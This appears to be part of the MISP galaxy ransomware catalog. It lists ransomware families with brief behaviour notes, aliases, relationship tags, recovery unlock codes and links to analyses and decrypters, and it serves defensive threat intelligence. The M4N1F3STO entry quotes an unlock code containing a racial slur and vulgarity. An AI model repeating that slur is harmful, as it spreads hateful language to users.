Table 8268. Table References

Links

http://blog.trendmicro.com/trendlabs-security-intelligence/angler-shift-ek-landscape-new-crytpo-ransomware-activity/

Gopher

Ransomware OS X ransomware (PoC)

The tag is: misp-galaxy:ransomware="Gopher"

Hacked

Ransomware Jigsaw Ransomware variant

The tag is: misp-galaxy:ransomware="Hacked"

Table 8269. Table References

Links

https://twitter.com/demonslay335/status/806878803507101696

http://id-ransomware.blogspot.com/2016/12/hackedlocker-ransomware.html

Harasom

Ransomware

The tag is: misp-galaxy:ransomware="Harasom"

Table 8271. Table References

Links

https://decrypter.emsisoft.com/

HDDCryptor

Ransomware Uses https://diskcryptor.net for full disk encryption

The tag is: misp-galaxy:ransomware="HDDCryptor"

HDDCryptor is also known as:

  • Mamba

HDDCryptor has relationships with:

  • similar: misp-galaxy:malpedia="Mamba" with estimative-language:likelihood-probability="likely"

Table 8272. Table References

Links

https://www.linkedin.com/pulse/mamba-new-full-disk-encryption-ransomware-family-member-marinho

http://blog.trendmicro.com/trendlabs-security-intelligence/bksod-by-ransomware-hddcryptor-uses-commercial-tools-to-encrypt-network-shares-and-lock-hdds/

http://id-ransomware.blogspot.com/2016/09/hddcryptor-ransomware-mbr.html

Heimdall

Ransomware File marker: "Heimdall---"

The tag is: misp-galaxy:ransomware="Heimdall"

Table 8273. Table References

Links

https://www.bleepingcomputer.com/news/security/heimdall-open-source-php-ransomware-targets-web-servers/

https://id-ransomware.blogspot.com/2016/11/heimdall-ransomware.html

Help_dcfile

Ransomware

The tag is: misp-galaxy:ransomware="Help_dcfile"

Table 8274. Table References

Links

http://id-ransomware.blogspot.com/2016/09/helpdcfile-ransomware.html

Herbst

Ransomware

The tag is: misp-galaxy:ransomware="Herbst"

Herbst has relationships with:

  • similar: misp-galaxy:malpedia="Herbst" with estimative-language:likelihood-probability="likely"

Table 8275. Table References

Links

https://blog.fortinet.com/2016/06/03/cooking-up-autumn-herbst-ransomware

https://id-ransomware.blogspot.com/2016/06/herbst-autumn-ransomware-aes-256-01.html

Hi Buddy!

Ransomware Based on HiddenTear

The tag is: misp-galaxy:ransomware="Hi Buddy!"

Table 8276. Table References

Links

http://www.nyxbone.com/malware/hibuddy.html

http://id-ransomware.blogspot.ru/2016/05/hi-buddy-ransomware-aes-256-0.html

HolyCrypt

Ransomware

The tag is: misp-galaxy:ransomware="HolyCrypt"

HolyCrypt has relationships with:

  • similar: misp-galaxy:ransomware="Dablio Ransomware" with estimative-language:likelihood-probability="likely"

Table 8278. Table References

Links

http://www.bleepingcomputer.com/news/security/new-python-ransomware-called-holycrypt-discovered/

https://id-ransomware.blogspot.com/2016/07/holycrypt-ransomware.html

HTCryptor

Ransomware. Includes a feature to disable the victim's Windows firewall. Modified in-dev HiddenTear.

The tag is: misp-galaxy:ransomware="HTCryptor"

Table 8279. Table References

Links

https://twitter.com/BleepinComputer/status/803288396814839808

iLock

Ransomware

The tag is: misp-galaxy:ransomware="iLock"

Table 8281. Table References

Links

https://twitter.com/BleepinComputer/status/817085367144873985

iLockLight

Ransomware

The tag is: misp-galaxy:ransomware="iLockLight"

International Police Association

Ransomware CryptoTorLocker2015 variant

The tag is: misp-galaxy:ransomware="International Police Association"

Table 8282. Table References

Links

http://download.bleepingcomputer.com/Nathan/StopPirates_Decrypter.exe

iRansom

Ransomware

The tag is: misp-galaxy:ransomware="iRansom"

Table 8283. Table References

Links

https://twitter.com/demonslay335/status/796134264744083460

http://id-ransomware.blogspot.com/2016/11/iransom-ransomware.html

JagerDecryptor

Ransomware Prepends filenames

The tag is: misp-galaxy:ransomware="JagerDecryptor"

Table 8284. Table References

Links

https://twitter.com/JakubKroustek/status/757873976047697920

Jeiphoos

Ransomware Windows, Linux. Campaign stopped. Actor claimed he deleted the master key.

The tag is: misp-galaxy:ransomware="Jeiphoos"

Jeiphoos is also known as:

  • Encryptor RaaS

  • Sarento

Table 8285. Table References

Links

http://www.nyxbone.com/malware/RaaS.html

http://blog.trendmicro.com/trendlabs-security-intelligence/the-rise-and-fall-of-encryptor-raas/

Jhon Woddy

Ransomware. Same codebase as DNRansomware. Lock screen password is M3VZ>5BwGGVH

The tag is: misp-galaxy:ransomware="Jhon Woddy"

Table 8286. Table References

Links

https://download.bleepingcomputer.com/demonslay335/DoNotOpenDecrypter.zip

https://twitter.com/BleepinComputer/status/822509105487245317

Jigsaw

Ransomware Has a GUI

The tag is: misp-galaxy:ransomware="Jigsaw"

Jigsaw is also known as:

  • CryptoHitMan

  • Jigsaw Original

Jigsaw has relationships with:

  • similar: misp-galaxy:malpedia="Jigsaw" with estimative-language:likelihood-probability="likely"

Table 8287. Table References

Links

http://www.bleepingcomputer.com/news/security/jigsaw-ransomware-decrypted-will-delete-your-files-until-you-pay-the-ransom/

https://www.helpnetsecurity.com/2016/04/20/jigsaw-crypto-ransomware/

https://twitter.com/demonslay335/status/795819556166139905

https://id-ransomware.blogspot.com/2016/04/jigsaw-ransomware.html

Job Crypter

Ransomware Based on HiddenTear, but uses TripleDES, decrypter is PoC

The tag is: misp-galaxy:ransomware="Job Crypter"

Job Crypter is also known as:

  • JobCrypter

Table 8288. Table References

Links

http://www.nyxbone.com/malware/jobcrypter.html

http://forum.malekal.com/jobcrypter-geniesanstravaille-extension-locked-crypto-ransomware-t54381.html

https://twitter.com/malwrhunterteam/status/828914052973858816

http://id-ransomware.blogspot.com/2016/05/jobcrypter-ransomware.html

JohnyCryptor

Ransomware

The tag is: misp-galaxy:ransomware="JohnyCryptor"

Table 8289. Table References

Links

http://id-ransomware.blogspot.com/2016/04/johnycryptor-ransomware.html

KawaiiLocker

Ransomware

The tag is: misp-galaxy:ransomware="KawaiiLocker"

Table 8290. Table References

Links

https://safezone.cc/resources/kawaii-decryptor.195/

http://id-ransomware.blogspot.com/2016/09/kawaiilocker-ransomware.html

KeRanger

Ransomware OS X Ransomware

The tag is: misp-galaxy:ransomware="KeRanger"

KeRanger has relationships with:

  • similar: misp-galaxy:malpedia="KeRanger" with estimative-language:likelihood-probability="likely"

Table 8291. Table References

Links

http://news.drweb.com/show/?i=9877&lng=en&c=5

http://www.welivesecurity.com/2016/03/07/new-mac-ransomware-appears-keranger-spread-via-transmission-app/

https://id-ransomware.blogspot.com/2016/03/keranger-ransomware.html

KeyBTC

Ransomware

The tag is: misp-galaxy:ransomware="KeyBTC"

Table 8292. Table References

Links

https://decrypter.emsisoft.com/

KillerLocker

Ransomware Possibly Portuguese dev

The tag is: misp-galaxy:ransomware="KillerLocker"

Table 8294. Table References

Links

https://twitter.com/malwrhunterteam/status/782232299840634881

http://id-ransomware.blogspot.com/2016/10/killerlocker-ransomware.html

Korean

Ransomware Based on HiddenTear

The tag is: misp-galaxy:ransomware="Korean"

Table 8296. Table References

Links

http://www.nyxbone.com/malware/koreanRansom.html

http://id-ransomware.blogspot.com/2016/08/korean-ransomware.html

KryptoLocker

Ransomware Based on HiddenTear

The tag is: misp-galaxy:ransomware="KryptoLocker"

Table 8299. Table References

Links

https://id-ransomware.blogspot.com/2016/07/kryptolocker-ransomware-aes-256.html

LanRan

Ransomware Variant of open-source MyLittleRansomware

The tag is: misp-galaxy:ransomware="LanRan"

Table 8300. Table References

Links

https://twitter.com/struppigel/status/847689644854595584

http://id-ransomware.blogspot.com/2017/03/lanran-ransomware.html

LeChiffre

Ransomware Encrypts first 0x2000 and last 0x2000 bytes. Via remote attacker

The tag is: misp-galaxy:ransomware="LeChiffre"

Table 8301. Table References

Links

https://decrypter.emsisoft.com/lechiffre

https://blog.malwarebytes.org/threat-analysis/2016/01/lechiffre-a-manually-run-ransomware/

http://id-ransomware.blogspot.com/2016/05/lechiffre-ransomware.html

Lick

Ransomware Variant of Kirk

The tag is: misp-galaxy:ransomware="Lick"

Table 8302. Table References

Links

https://twitter.com/JakubKroustek/status/842404866614038529

https://www.2-spyware.com/remove-lick-ransomware-virus.html

Linux.Encoder

Ransomware Linux Ransomware

The tag is: misp-galaxy:ransomware="Linux.Encoder"

Linux.Encoder is also known as:

  • Linux.Encoder.{0,3}

Table 8303. Table References

Links

https://labs.bitdefender.com/2015/11/linux-ransomware-debut-fails-on-predictable-encryption-key/

LK Encryption

Ransomware Based on HiddenTear

The tag is: misp-galaxy:ransomware="LK Encryption"

Table 8304. Table References

Links

https://twitter.com/malwrhunterteam/status/845183290873044994

http://id-ransomware.blogspot.com/2017/03/lk-encryption-ransomware.html

LLTP Locker

Ransomware Targeting Spanish speaking victims

The tag is: misp-galaxy:ransomware="LLTP Locker"

Table 8305. Table References

Links

https://www.bleepingcomputer.com/news/security/new-lltp-ransomware-appears-to-be-a-rewritten-venus-locker/

http://id-ransomware.blogspot.com/2017/03/lltp-ransomware.html

Locker

Ransomware has GUI

The tag is: misp-galaxy:ransomware="Locker"

Locker is also known as:

  • LockeR

Table 8306. Table References

Links

http://www.bleepingcomputer.com/forums/t/577246/locker-ransomware-support-and-help-topic/page-32#entry3721545

https://id-ransomware.blogspot.com/2016/04/locker-ransomware-2015.html

Lortok

Ransomware

The tag is: misp-galaxy:ransomware="Lortok"

Table 8309. Table References

Links

https://id-ransomware.blogspot.com/2016/06/lortok-ransomware-aes-256-5.html

LowLevel04

Ransomware Prepends filenames

The tag is: misp-galaxy:ransomware="LowLevel04"

Table 8310. Table References

Links

http://id-ransomware.blogspot.com/2016/04/lowlevel04-ransomware.html

M4N1F3STO

Ransomware Does not encrypt Unlock code=suckmydicknigga

The tag is: misp-galaxy:ransomware="M4N1F3STO"

Table 8311. Table References

Links

https://twitter.com/jiriatvirlab/status/808015275367002113

http://id-ransomware.blogspot.com/2016/12/m4n1f3sto-ransomware.html

Mabouia

Ransomware OS X ransomware (PoC)

The tag is: misp-galaxy:ransomware="Mabouia"

Table 8312. Table References

Links

https://www.youtube.com/watch?v=9nJv_PN2m1Y

MacAndChess

Ransomware Based on HiddenTear

The tag is: misp-galaxy:ransomware="MacAndChess"

Table 8313. Table References

Links

http://id-ransomware.blogspot.com/2017/03/macandchess-ransomware.html

Magic

Ransomware Based on EDA2

The tag is: misp-galaxy:ransomware="Magic"

Table 8314. Table References

Links

http://id-ransomware.blogspot.com/2016/04/magic-ransomware.html

Meister

Ransomware Targeting French victims

The tag is: misp-galaxy:ransomware="Meister"

Table 8317. Table References

Links

https://twitter.com/siri_urz/status/840913419024945152

Meteoritan

Ransomware

The tag is: misp-galaxy:ransomware="Meteoritan"

Table 8318. Table References

Links

https://twitter.com/malwrhunterteam/status/844614889620561924

http://id-ransomware.blogspot.com/2017/03/meteoritan-ransomware.html

MireWare

Ransomware Based on HiddenTear

The tag is: misp-galaxy:ransomware="MireWare"

Table 8320. Table References

Links

http://id-ransomware.blogspot.com/2016/05/mireware-ransomware.html

Mischa

Ransomware Packaged with Petya PDFBewerbungsmappe.exe

The tag is: misp-galaxy:ransomware="Mischa"

Mischa is also known as:

  • "Petya’s little brother"

  • Misha

  • Petya+Mischa

  • Petya-2

Table 8321. Table References

Links

http://www.bleepingcomputer.com/news/security/petya-is-back-and-with-a-friend-named-mischa-ransomware/

https://id-ransomware.blogspot.com/2016/05/petya-mischa-ransomware.html

MM Locker

Ransomware Based on EDA2

The tag is: misp-galaxy:ransomware="MM Locker"

MM Locker is also known as:

  • Booyah

MM Locker has relationships with:

  • similar: misp-galaxy:ransomware="Booyah" with estimative-language:likelihood-probability="likely"

Table 8322. Table References

Links

https://www.proofpoint.com/us/threat-insight/post/ransomware-explosion-continues-cryptflle2-brlock-mm-locker-discovered

https://id-ransomware.blogspot.com/2016/06/mm-locker-ransomware-aes-2256-1.html

Mobef

Ransomware

The tag is: misp-galaxy:ransomware="Mobef"

Mobef is also known as:

  • Yakes

  • CryptoBit

Mobef has relationships with:

  • similar: misp-galaxy:ransomware="CryptoBit" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Mobef-JustFun" with estimative-language:likelihood-probability="likely"

Table 8323. Table References

Links

http://nyxbone.com/malware/Mobef.html

http://researchcenter.paloaltonetworks.com/2016/07/unit42-cryptobit-another-ransomware-family-gets-an-update/

http://nyxbone.com/images/articulos/malware/mobef/0.png

http://id-ransomware.blogspot.com/2016/05/mobef-yakes-ransomware-4-bitcoins-2000.html

Monument

Ransomware. Uses the DarkLocker 5 porn screenlocker; Jigsaw variant

The tag is: misp-galaxy:ransomware="Monument"

Table 8324. Table References

Links

https://twitter.com/malwrhunterteam/status/844826339186135040

N-Splitter

Ransomware Russian Koolova Variant

The tag is: misp-galaxy:ransomware="N-Splitter"

Table 8325. Table References

Links

https://twitter.com/JakubKroustek/status/815961663644008448

https://www.youtube.com/watch?v=dAVMgX8Zti4&feature=youtu.be&list=UU_TMZYaLIgjsdJMwurHAi4Q

n1n1n1

Ransomware File marker: "333333333333"

The tag is: misp-galaxy:ransomware="n1n1n1"

n1n1n1 is also known as:

  • N1N1N1

Table 8326. Table References

Links

https://twitter.com/demonslay335/status/790608484303712256

https://twitter.com/demonslay335/status/831891344897482754

http://id-ransomware.blogspot.com/2016/09/n1n1n1-ransomware.html

NanoLocker

Ransomware no extension change, has a GUI

The tag is: misp-galaxy:ransomware="NanoLocker"

NanoLocker has relationships with:

  • similar: misp-galaxy:malpedia="NanoLocker" with estimative-language:likelihood-probability="likely"

Table 8327. Table References

Links

http://github.com/Cyberclues/nanolocker-decryptor

https://id-ransomware.blogspot.com/2016/06/nanolocker-ransomware-aes-256-rsa-01.html

Nemucod

Ransomware. 7zip (a0.exe) variant cannot be decrypted. Encrypts the first 2048 bytes.

The tag is: misp-galaxy:ransomware="Nemucod"

Nemucod is also known as:

  • Nemucod-7z

  • Nemucod-AES

Table 8328. Table References

Links

https://decrypter.emsisoft.com/nemucod

https://github.com/Antelox/NemucodFR

http://www.bleepingcomputer.com/news/security/decryptor-released-for-the-nemucod-trojans-crypted-ransomware/

https://blog.cisecurity.org/malware-analysis-report-nemucod-ransomware/

http://id-ransomware.blogspot.com/2016/04/nemucod-ransomware.html

Netix

Ransomware

The tag is: misp-galaxy:ransomware="Netix"

Netix is also known as:

  • RANSOM_NETIX.A

Table 8329. Table References

Links

http://blog.trendmicro.com/trendlabs-security-intelligence/netflix-scam-delivers-ransomware/

https://id-ransomware.blogspot.com/2017/01/netflix-ransomware.html

Nhtnwcuf

Ransomware Does not encrypt the files / Files are destroyed

The tag is: misp-galaxy:ransomware="Nhtnwcuf"

Table 8330. Table References

Links

https://twitter.com/demonslay335/status/839221457360195589

http://id-ransomware.blogspot.com/2017/03/nhtnwcuf-ransomware.html

NMoreira

Ransomware

The tag is: misp-galaxy:ransomware="NMoreira"

NMoreira is also known as:

  • XRatTeam

  • XPan

Table 8331. Table References

Links

https://decrypter.emsisoft.com/nmoreira

https://twitter.com/fwosar/status/803682662481174528

http://id-ransomware.blogspot.com/2016/11/nmoreira-ransomware.html

Nuke

Ransomware

The tag is: misp-galaxy:ransomware="Nuke"

Table 8333. Table References

Links

http://id-ransomware.blogspot.com/2016/10/nuke-ransomware.html

Offline ransomware

Ransomware email addresses overlap with .777 addresses

The tag is: misp-galaxy:ransomware="Offline ransomware"

Offline ransomware is also known as:

  • Vipasana

  • Cryakl

Offline ransomware has relationships with:

  • similar: misp-galaxy:ransomware="Cryakl" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Cryakl" with estimative-language:likelihood-probability="likely"

Table 8336. Table References

Links

https://support.kaspersky.com/viruses/disinfection/8547

http://bartblaze.blogspot.com.co/2016/02/vipasana-ransomware-new-ransom-on-block.html

OMG! Ransomware

Ransomware. Infection: drive-by-download; Platform: Windows; Extortion by prepaid voucher

The tag is: misp-galaxy:ransomware="OMG! Ransomware"

OMG! Ransomware is also known as:

  • GPCode

OMG! Ransomware has relationships with:

  • similar: misp-galaxy:malpedia="GPCode" with estimative-language:likelihood-probability="likely"

Table 8337. Table References

Links

https://arxiv.org/pdf/2102.06249.pdf

Operation Global III

Ransomware Is a file infector (virus)

The tag is: misp-galaxy:ransomware="Operation Global III"

Table 8338. Table References

Links

http://news.thewindowsclub.com/operation-global-iii-ransomware-decryption-tool-released-70341/

Owl

Ransomware

The tag is: misp-galaxy:ransomware="Owl"

Owl is also known as:

  • CryptoWire

Owl has relationships with:

  • similar: misp-galaxy:malpedia="CryptoWire" with estimative-language:likelihood-probability="likely"

Table 8339. Table References

Links

https://twitter.com/JakubKroustek/status/842342996775448576

https://id-ransomware.blogspot.com/2016/10/cryptowire-ransomware.html

PadCrypt

Ransomware has a live support chat

The tag is: misp-galaxy:ransomware="PadCrypt"

PadCrypt has relationships with:

  • similar: misp-galaxy:malpedia="PadCrypt" with estimative-language:likelihood-probability="likely"

Table 8340. Table References

Links

http://www.bleepingcomputer.com/news/security/padcrypt-the-first-ransomware-with-live-support-chat-and-an-uninstaller/

https://twitter.com/malwrhunterteam/status/798141978810732544

http://id-ransomware.blogspot.com/2016/04/padcrypt-ransomware.html

Padlock Screenlocker

Ransomware Unlock code is: ajVr/G\ RJz0R

The tag is: misp-galaxy:ransomware="Padlock Screenlocker"

Table 8341. Table References

Links

https://twitter.com/BleepinComputer/status/811635075158839296

Patcher

Ransomware Targeting macOS users

The tag is: misp-galaxy:ransomware="Patcher"

Patcher has relationships with:

  • similar: misp-galaxy:ransomware="FileCoder" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Patcher" with estimative-language:likelihood-probability="likely"

Table 8342. Table References

Links

https://blog.malwarebytes.com/cybercrime/2017/02/decrypting-after-a-findzip-ransomware-infection/

https://www.bleepingcomputer.com/news/security/new-macos-patcher-ransomware-locks-data-for-good-no-way-to-recover-your-files/

Petya

Ransomware encrypts disk partitions PDFBewerbungsmappe.exe

The tag is: misp-galaxy:ransomware="Petya"

Petya is also known as:

  • Goldeneye

Petya has relationships with:

  • similar: misp-galaxy:malpedia="Petya" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="GoldenEye Ransomware" with estimative-language:likelihood-probability="likely"

Table 8343. Table References

Links

http://www.thewindowsclub.com/petya-ransomware-decrypt-tool-password-generator

https://www.youtube.com/watch?v=mSqxFjZq_z4

https://blog.malwarebytes.org/threat-analysis/2016/04/petya-ransomware/

https://www.bleepingcomputer.com/news/security/petya-ransomware-returns-with-goldeneye-version-continuing-james-bond-theme/

Philadelphia

Ransomware Coded by "The_Rainmaker"

The tag is: misp-galaxy:ransomware="Philadelphia"

Table 8344. Table References

Links

https://decrypter.emsisoft.com/philadelphia

https://www.bleepingcomputer.com/news/security/the-philadelphia-ransomware-offers-a-mercy-button-for-compassionate-criminals/

http://id-ransomware.blogspot.ru/2016/09/philadelphia-ransomware.html

Polyglot

Ransomware Imitates CTB-Locker

The tag is: misp-galaxy:ransomware="Polyglot"

Polyglot has relationships with:

  • similar: misp-galaxy:malpedia="Polyglot" with estimative-language:likelihood-probability="likely"

Table 8347. Table References

Links

https://support.kaspersky.com/8547

https://securelist.com/blog/research/76182/polyglot-the-fake-ctb-locker/

PowerWorm

Ransomware no decryption possible, throws key away, destroys the files

The tag is: misp-galaxy:ransomware="PowerWorm"

PRISM

Ransomware

The tag is: misp-galaxy:ransomware="PRISM"

Table 8350. Table References

Links

http://www.enigmasoftware.com/prismyourcomputerhasbeenlockedransomware-removal/

Ps2exe

Ransomware

The tag is: misp-galaxy:ransomware="Ps2exe"

Table 8351. Table References

Links

https://twitter.com/jiriatvirlab/status/803297700175286273

R

Ransomware

The tag is: misp-galaxy:ransomware="R"

R is also known as:

  • NM3

Table 8352. Table References

Links

https://twitter.com/malwrhunterteam/status/846705481741733892

http://id-ransomware.blogspot.com/2017/03/r-ransomware.html

RAA encryptor

Ransomware Possible affiliation with Pony

The tag is: misp-galaxy:ransomware="RAA encryptor"

RAA encryptor is also known as:

  • RAA

  • RAA SEP

Table 8354. Table References

Links

https://reaqta.com/2016/06/raa-ransomware-delivering-pony/

http://www.bleepingcomputer.com/news/security/the-new-raa-ransomware-is-created-entirely-using-javascript/

https://id-ransomware.blogspot.com/2016/06/raa-ransomware-aes-256-039-250.html

Rabion

Ransomware RaaS Copy of Ranion RaaS

The tag is: misp-galaxy:ransomware="Rabion"

Table 8355. Table References

Links

https://twitter.com/CryptoInsane/status/846181140025282561

Radamant

Ransomware

The tag is: misp-galaxy:ransomware="Radamant"

Radamant has relationships with:

  • similar: misp-galaxy:malpedia="Radamant" with estimative-language:likelihood-probability="likely"

Table 8356. Table References

Links

https://decrypter.emsisoft.com/radamant

http://www.bleepingcomputer.com/news/security/new-radamant-ransomware-kit-adds-rdm-extension-to-encrypted-files/

http://www.nyxbone.com/malware/radamant.html

https://id-ransomware.blogspot.com/2016/04/radamant-ransomware.html

Rakhni

Ransomware Files might be partially encrypted

The tag is: misp-galaxy:ransomware="Rakhni"

Rakhni is also known as:

  • Agent.iih

  • Aura

  • Autoit

  • Pletor

  • Rotor

  • Lamer

  • Isda

  • Cryptokluchen

  • Bandarchor

Rakhni has relationships with:

  • similar: misp-galaxy:ransomware="Bandarchor" with estimative-language:likelihood-probability="likely"

Table 8357. Table References

Links

https://support.kaspersky.com/us/viruses/disinfection/10556

https://id-ransomware.blogspot.com/2016/07/bandarchor-ransomware-aes-256.html

Ramsomeer

Ransomware Based on the DUMB ransomware

The tag is: misp-galaxy:ransomware="Ramsomeer"

Rannoh

Ransomware

The tag is: misp-galaxy:ransomware="Rannoh"

Table 8358. Table References

Links

https://support.kaspersky.com/viruses/disinfection/8547

Ransoc

Ransomware Doesn’t encrypt user files

The tag is: misp-galaxy:ransomware="Ransoc"

Ransoc has relationships with:

  • similar: misp-galaxy:malpedia="Ransoc" with estimative-language:likelihood-probability="likely"

Table 8360. Table References

Links

https://www.proofpoint.com/us/threat-insight/post/ransoc-desktop-locking-ransomware-ransacks-local-files-social-media-profiles

https://www.bleepingcomputer.com/news/security/ransoc-ransomware-extorts-users-who-accessed-questionable-content/

Ransom32

Ransomware no extension change, Javascript Ransomware

The tag is: misp-galaxy:ransomware="Ransom32"

Table 8361. Table References

Links

http://id-ransomware.blogspot.com/2016/04/ransom32.html

RansomLock

Ransomware Locks the desktop

The tag is: misp-galaxy:ransomware="RansomLock"

Table 8362. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2009-041513-1400-99&tabid=2

RarVault

Ransomware

The tag is: misp-galaxy:ransomware="RarVault"

Table 8363. Table References

Links

http://id-ransomware.blogspot.com/2016/09/rarvault-ransomware.html

Rector

Ransomware

The tag is: misp-galaxy:ransomware="Rector"

Table 8365. Table References

Links

https://support.kaspersky.com/viruses/disinfection/4264

RektLocker

Ransomware

The tag is: misp-galaxy:ransomware="RektLocker"

Table 8366. Table References

Links

https://support.kaspersky.com/viruses/disinfection/4264

http://id-ransomware.blogspot.com/2016/08/rektlocker-ransomware.html

Rokku

Ransomware possibly related with Chimera

The tag is: misp-galaxy:ransomware="Rokku"

Rokku has relationships with:

  • similar: misp-galaxy:malpedia="Rokku" with estimative-language:likelihood-probability="likely"

Table 8368. Table References

Links

https://blog.malwarebytes.org/threat-analysis/2016/04/rokku-ransomware/

https://id-ransomware.blogspot.com/2016/04/rokku-ransomware.html

RoshaLock

Ransomware Stores your files in a password protected RAR file

The tag is: misp-galaxy:ransomware="RoshaLock"

Table 8369. Table References

Links

https://twitter.com/siri_urz/status/842452104279134209

https://id-ransomware.blogspot.com/2017/02/allyourdocuments-ransomware.html

Runsomewere

Ransomware Based on HT/EDA2 Utilizes the Jigsaw Ransomware background

The tag is: misp-galaxy:ransomware="Runsomewere"

Table 8370. Table References

Links

https://twitter.com/struppigel/status/801812325657440256

RussianRoulette

Ransomware Variant of the Philadelphia ransomware

The tag is: misp-galaxy:ransomware="RussianRoulette"

Table 8371. Table References

Links

https://twitter.com/struppigel/status/823925410392080385

SADStory

Ransomware Variant of CryPy

The tag is: misp-galaxy:ransomware="SADStory"

Table 8372. Table References

Links

https://twitter.com/malwrhunterteam/status/845356853039190016

http://id-ransomware.blogspot.com/2017/03/sadstory-ransomware.html

Sage 2.2

Ransomware Sage 2.2 deletes volume snapshots through vssadmin.exe, disables startup repair, uses process wscript.exe to execute a VBScript, and coordinates the execution of scheduled tasks via schtasks.exe.

The tag is: misp-galaxy:ransomware="Sage 2.2"

Table 8373. Table References

Links

https://malwarebreakdown.com/2017/03/16/sage-2-2-ransomware-from-good-man-gate

https://malwarebreakdown.com/2017/03/10/finding-a-good-man/

Sanction

Ransomware Based on HiddenTear, but heavily modified keygen

The tag is: misp-galaxy:ransomware="Sanction"

Table 8375. Table References

Links

http://id-ransomware.blogspot.com/2016/05/sanction-ransomware-3.html

Sanctions

Ransomware

The tag is: misp-galaxy:ransomware="Sanctions"

Sanctions is also known as:

  • Sanctions 2017

Table 8376. Table References

Links

https://www.bleepingcomputer.com/news/security/sanctions-ransomware-makes-fun-of-usa-sanctions-against-russia/

http://id-ransomware.blogspot.com/2017/03/sanctions-2017-ransomware.html

Sardoninir

Ransomware

The tag is: misp-galaxy:ransomware="Sardoninir"

Table 8377. Table References

Links

https://twitter.com/BleepinComputer/status/835955409953357825

Satana

Ransomware

The tag is: misp-galaxy:ransomware="Satana"

Satana has relationships with:

  • similar: misp-galaxy:malpedia="Satana" with estimative-language:likelihood-probability="likely"

Table 8378. Table References

Links

https://blog.malwarebytes.com/threat-analysis/2016/06/satana-ransomware/

https://blog.kaspersky.com/satana-ransomware/12558/

https://id-ransomware.blogspot.com/2016/06/satana-ransomware-0.html

Scraper

Ransomware

The tag is: misp-galaxy:ransomware="Scraper"

Table 8379. Table References

Links

http://securelist.com/blog/research/69481/a-flawed-ransomware-encryptor/

Serpico

Ransomware DetoxCrypto Variant

The tag is: misp-galaxy:ransomware="Serpico"

Serpico has relationships with:

  • similar: misp-galaxy:malpedia="Serpico" with estimative-language:likelihood-probability="likely"

Table 8380. Table References

Links

http://www.nyxbone.com/malware/Serpico.html

http://id-ransomware.blogspot.com/2016/08/serpico-ransomware.html

Shark

Ransomware

The tag is: misp-galaxy:ransomware="Shark"

Shark is also known as:

  • Atom

Shark has relationships with:

  • similar: misp-galaxy:rat="SharK" with estimative-language:likelihood-probability="likely"

Table 8381. Table References

Links

http://www.bleepingcomputer.com/news/security/the-shark-ransomware-project-allows-to-create-your-own-customized-ransomware/

http://www.bleepingcomputer.com/news/security/shark-ransomware-rebrands-as-atom-for-a-fresh-start/

Shujin

Ransomware

The tag is: misp-galaxy:ransomware="Shujin"

Shujin is also known as:

  • KinCrypt

Shujin has relationships with:

  • similar: misp-galaxy:malpedia="Shujin" with estimative-language:likelihood-probability="likely"

Table 8383. Table References

Links

http://www.nyxbone.com/malware/chineseRansom.html

http://blog.trendmicro.com/trendlabs-security-intelligence/chinese-language-ransomware-makes-appearance/

http://id-ransomware.blogspot.com/2016/05/chinese-ransomware.html

Simple_Encoder

Ransomware

The tag is: misp-galaxy:ransomware="Simple_Encoder"

Simple_Encoder is also known as:

  • Tilde

Table 8384. Table References

Links

http://www.bleepingcomputer.com/news/security/the-shark-ransomware-project-allows-to-create-your-own-customized-ransomware/

https://id-ransomware.blogspot.com/2016/07/tilde-ransomware-aes-08.html

SkidLocker

Ransomware Based on EDA2

The tag is: misp-galaxy:ransomware="SkidLocker"

SkidLocker is also known as:

  • Pompous

Table 8385. Table References

Links

http://www.bleepingcomputer.com/news/security/pompous-ransomware-dev-gets-defeated-by-backdoor/

http://www.nyxbone.com/malware/SkidLocker.html

http://id-ransomware.blogspot.com/2016/04/pompous-ransomware.html

Smash!

Ransomware

The tag is: misp-galaxy:ransomware="Smash!"

Table 8386. Table References

Links

https://www.bleepingcomputer.com/news/security/smash-ransomware-is-cute-rather-than-dangerous/

Smrss32

Ransomware

The tag is: misp-galaxy:ransomware="Smrss32"

Table 8387. Table References

Links

http://id-ransomware.blogspot.com/2016/08/smrss32-ransomware.html

Sport

Ransomware

The tag is: misp-galaxy:ransomware="Sport"

Strictor

Ransomware Based on EDA2, shows Guy Fawkes mask

The tag is: misp-galaxy:ransomware="Strictor"

Table 8390. Table References

Links

http://www.nyxbone.com/malware/Strictor.html

Surprise

Ransomware Based on EDA2

The tag is: misp-galaxy:ransomware="Surprise"

Table 8391. Table References

Links

http://id-ransomware.blogspot.com/2016/05/surprise-ransomware-aes-256.html

Survey

Ransomware Still in development, shows FileIce survey

The tag is: misp-galaxy:ransomware="Survey"

Table 8392. Table References

Links

http://www.bleepingcomputer.com/news/security/in-dev-ransomware-forces-you-do-to-survey-before-unlocking-computer/

SynoLocker

Ransomware Exploited Synology NAS firmware directly over WAN

The tag is: misp-galaxy:ransomware="SynoLocker"

TeamXrat

Ransomware

The tag is: misp-galaxy:ransomware="TeamXrat"

Table 8394. Table References

Links

https://securelist.com/blog/research/76153/teamxrat-brazilian-cybercrime-meets-ransomware/

TeslaCrypt 0.x - 2.2.0

Ransomware Factorization

The tag is: misp-galaxy:ransomware="TeslaCrypt 0.x - 2.2.0"

TeslaCrypt 0.x - 2.2.0 is also known as:

  • AlphaCrypt

Table 8395. Table References

Links

http://www.bleepingcomputer.com/forums/t/576600/tesladecoder-released-to-decrypt-exx-ezz-ecc-files-encrypted-by-teslacrypt/

http://www.talosintel.com/teslacrypt_tool/

Threat Finder

Ransomware Files cannot be decrypted Has a GUI

The tag is: misp-galaxy:ransomware="Threat Finder"

TorrentLocker

Ransomware Newer variants not decryptable. Only first 2 MB are encrypted

The tag is: misp-galaxy:ransomware="TorrentLocker"

TorrentLocker is also known as:

  • Crypt0L0cker

  • CryptoFortress

  • Teerac

TorrentLocker has relationships with:

  • similar: misp-galaxy:ransomware="CryptoFortress" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="CryptoFortress" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="TorrentLocker" with estimative-language:likelihood-probability="likely"

Table 8399. Table References

Links

